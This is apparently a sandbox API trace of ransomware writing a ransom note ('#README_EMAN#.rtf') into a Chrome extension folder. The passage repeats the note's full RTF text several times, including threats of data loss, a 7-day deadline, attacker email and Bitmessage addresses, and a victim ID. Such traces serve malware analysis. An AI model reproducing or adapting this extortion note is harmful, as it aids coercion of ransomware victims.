\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.265] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.265] CloseHandle (hObject=0x2e8) returned 1 [0285.265] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0285.265] GetLastError () returned 0x2 [0285.265] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0285.266] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.266] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.266] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 